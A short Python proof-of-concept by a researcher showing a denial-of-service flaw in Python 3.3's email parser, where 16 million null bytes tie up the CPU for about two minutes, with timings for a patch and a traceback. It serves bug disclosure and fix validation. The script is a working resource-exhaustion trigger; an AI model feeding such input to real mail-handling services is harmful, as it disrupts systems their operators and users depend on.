#!/usr/bin/env python3
"""
DoS against Python3.3 email.message_from_binary_file
by Javantea
Sept 24, 2015

It takes email.message_from_binary_file 2 minutes at 100% cpu to parse 16 million nulls.

time python3 mail1_dos1.py >mail1_dos1a.txt 2>&1 &

time python3 -m profile mail1_dos1.py >mail1_dos1c.txt 2>&1 &

# With feedparser_dos.patch applied:
time python3 mail1_dos1.py

real    0m2.483s
user    0m2.463s
sys     0m0.019s

40x speedup against this DoS condition.
<3.5e-5 slowdown in the average case. This claim is validated by mail1_all.py
The error bar for this measurement is large compared to the value.
"""
from __future__ import print_function
import email
import os

if not os.path.exists('test_16m_null.bin'):
	open('test_16m_null.bin', 'wb').write(b'\x00'*(1<<24))
#end if
fp = open('test_16m_null.bin','rb')
m = email.message_from_binary_file(fp)

# My code just calls message_from_binary_file
#import mail1
#fp = open('test_16m_null.bin','rb')
#m = mail1.message_from_binary_file(fp)
# Takes 2m, 100% cpu. Glad I tried this.
"""
^CTraceback (most recent call last):
  File "<stdin>", line 1, in <module>
  File "./mail1.py", line 232, in message_from_binary_file
    return email.message_from_binary_file(fp, *args, **kws)
  File "/usr/lib64/python3.3/email/__init__.py", line 64, in message_from_binary_file
    return BytesParser(*args, **kws).parse(fp)
  File "/usr/lib64/python3.3/email/parser.py", line 111, in parse
    return self.parser.parse(fp, headersonly)
  File "/usr/lib64/python3.3/email/parser.py", line 58, in parse
    feedparser.feed(data)
  File "/usr/lib64/python3.3/email/feedparser.py", line 167, in feed
    self._input.push(data)
  File "/usr/lib64/python3.3/email/feedparser.py", line 102, in push
    parts = NLCRE_crack.split(data)
KeyboardInterrupt
"""
